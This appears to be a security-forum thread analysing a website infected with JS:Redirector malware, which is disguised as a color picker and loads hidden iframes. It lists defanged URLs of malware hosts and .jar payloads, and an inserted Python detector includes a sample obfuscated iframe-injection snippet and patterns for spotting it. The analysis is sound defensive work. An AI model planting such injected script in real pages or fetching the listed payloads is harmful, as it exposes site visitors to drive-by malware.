JS:Redirector-FX[Trj]

Been trying to access www dot showfilmfirst dot com today and keep getting the following “trojan horse blocked” warning:

Object: http://www dot showfilmfirst dot com/
Infection: JS:Redirector-FX[Trj]
Action: Connection Aborted

I’ve never had any problems accessing this website before. In fact 2 days ago I signed up to become a VIP member with the same website. I’ve tried accessing it with Chrome and Internet Explorer.

I use this website quite a bit. Any ideas why this is happening suddenly?

Please, do not post live links to malware or false positives!
Use httx or www . shwfilfirst . com

Sucuri Scanner says infected, see screenshot

That takes all the fun out of hunting for it… :stuck_out_tongue:

well you can still do Jsunpack :wink: naaaaa … already have, and it is very red malicious: Alert detected /alert CVE-2010-0249

Here is wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=b6478ed3f43807f1437d5454d2a157ed&t=1301343631&type=js

I use Malzilla and Notepad++ only jsunpack to try and deobfuscate it ;D

Well, Pondus is right, so what is out there at htxp://www.showfilmfirst.com/
Known javascript malware: http://sucuri.net/malware/malware-entry-mwjs1240
To know exactly: 11 instances of this same javascript malware…
Javascript included and used to distribute malware on osCommerce sites. The code is disguised as a color picker,
but in fact loads a malicious iframe (for the Fake AV)…
See the sucuri scan site for the technical details of where the malware was found…

polonus

What is the fun as jsunpack clearly states malicious: hxtp://jsunpack.jeek.org/dec/go?report=5f417080b4d7eac44ef31df1094fa022063f5fcb
(Only go there when you are security-aware enough and have enough protection against malscript spilling, e.g. NotScripts or NoScript protection inside the browser, in a sandbox; cleanse your browser contents and scan your user files if in doubt). Besides, here is a discussion about detecting and cleansing the infection from an osCommerce site: http://forums.oscommerce.com/topic/335941-site-infected-by-infected-jsredirector-h3-trj/

polonus

SOPHOS analysis confirms infected

showfilmfirst.com.htm -- identity created/updated (New detection Troj/JSRedir-DC)

NORMAN analysis

showfilmfirst.com.htm : Processed - JS/IFrame.EE

The above website page is injected with a malicious script which further writes an iframe “htxp://86.55.140.203/…” and again redirects to a malicious script hosted at the legitimate website “htxp://tongho.co.th/…”
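As an added illustration (not code from this thread or from any of the scanners mentioned), a small Python checker that looks for the signs described above: an inline script posing as a helper that document.write()s a percent-encoded, zero-size iframe. The sample markup and the 198.51.100.7 address are constructed placeholders, not the real injected code.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample page (not the code found on the site in the thread): an inline
# script posing as a "color pick" helper document.write()s a percent-encoded,
# zero-size iframe pointing at a documentation-range address.
SAMPLE_HTML = """<html><head>
<script type="text/javascript" src="/js/colorpicker.js"></script>
<script>/* color pick */ document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F198.51.100.7%2Fin.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E'));</script>
</head><body>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
OBFUSCATION_MARKERS = ("unescape(", "fromCharCode(", "eval(", "document.write(")


def iframes(markup):
    """Yield {'host', 'hidden'} for every <iframe> in markup; 'hidden' is true for
    zero/one-pixel frames or CSS that hides them, the classic drive-by pattern."""
    for m in IFRAME_RE.finditer(markup):
        attrs = {k.lower(): dq or sq or bare for k, dq, sq, bare in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        yield {"host": urlparse(attrs.get("src", "")).hostname or "",
               "hidden": tiny or "display:none" in style or "visibility:hidden" in style}


def scan_page(html, allowed_hosts):
    """Return findings: obfuscated inline scripts, iframes that only appear after
    percent-decoding script string literals, and hidden or off-site iframes."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        marker = next((m for m in OBFUSCATION_MARKERS if m in script), None)
        if marker:
            findings.append({"kind": "obfuscated_script", "marker": marker})
        # unquote() undoes unescape()-style %XX encoding so IFRAME_RE can see the tag
        for f in iframes(unquote(script)):
            findings.append({"kind": "written_iframe", **f})
    for f in iframes(html):
        if f["hidden"] or f["host"] not in allowed_hosts:
            findings.append({"kind": "suspicious_iframe", **f})
    return findings
```

Run it over a saved copy of a page (allowed_hosts being the domains you legitimately embed); anything reported as written_iframe or suspicious_iframe is worth pulling the source for.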

Hi Pondus,

If I go here and open up Unmasked Parasites on http://www.google.com/safebrowsing/diagnostic?site=tongho.co.th
then initially I get clean, but when I really click through for this page I get:
http://www.google.com/safebrowsing/diagnostic?site=tongho.co.th

The last time Google visited this site was on 29/03/2011. The last time suspicious content was found on this site was on 29/03/2011.
Malicious software includes 203 trojan(s), 111 scripting exploit(s).

This site was hosted on a network(s) including AS23884 (PROENNET).

Has this site acted as an intermediary resulting in further distribution of malware?
It seems that tongho.co.th the past 90 days has functioned as an intermediary for the infection of 168 site(s) including freephotopaper.com/, webandgraphicsolutions.com/, componentesdebisuteria.es/.

Has this site hosted malware?
Yes, this site has in the past 90 days hosted malicious software. It infected 387 domain(s), including babyinfanti.cl/, m-indya.com/, freephotopaper.com/.

I also find that on URLVoid all seems clean, but inspecting further by clicking the sublinks the site is flagged somewhere… So you had better always verify when you are checking these resources…
And now at the original scan site Unmasked Parasites finds reason for suspicion:
http://www.google.com/safebrowsing/diagnostic?site=www.showfilmfirst.com

Malicious software includes 2 scripting exploits. Successful infection resulted in an average of 1 new process on the target machine.

Malicious software is hosted on 4 domains, e.g. guardwinscan.com/, solomon-vl.cz.cc/, tournamentwinscan.com/.

2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including 86.55.140.0/, protectprofitscan.com/.

This site was hosted on 1 network(s) including AS20738 (AS20738).

See for the origin of distributed malware: http://safeweb.norton.com/report/show?name=protectprofitscan.com
Firefox Malware site
G-Data Malware site
Google Safebrowsing Malware site
Small wonder it now appears here on the netblocks list during the last 24 hrs: http://www.pyrenean.com/Netblocks
and a nice article on the DNS Super Black Hole can be found here: http://www.computersecurityarticles.info/tag/hunting/
source: computersecurityarticles dot info

pol

So, hopping from the one malware to the other, I took a glance at: htxp://solomon-vl.cz.cc/574a353789f/ob.jar

What is out there? JAVA/Exdoer.S detection: http://www.virustotal.com/file-scan/report.html?id=631b5e7976e5c28c1e3fad5cd3697e20b5c27d5dc42c87499b231fde55c7a0de-1301380375

Here it was, now dead: htxp://sfzzjd.com/games/player.jar

But avast missed it: http://www.virustotal.com/file-scan/report.html?id=a699d7d50006d576e1b23c316e334ce6f52c09919ee18dd85635f58fd490a929-1300680344

pol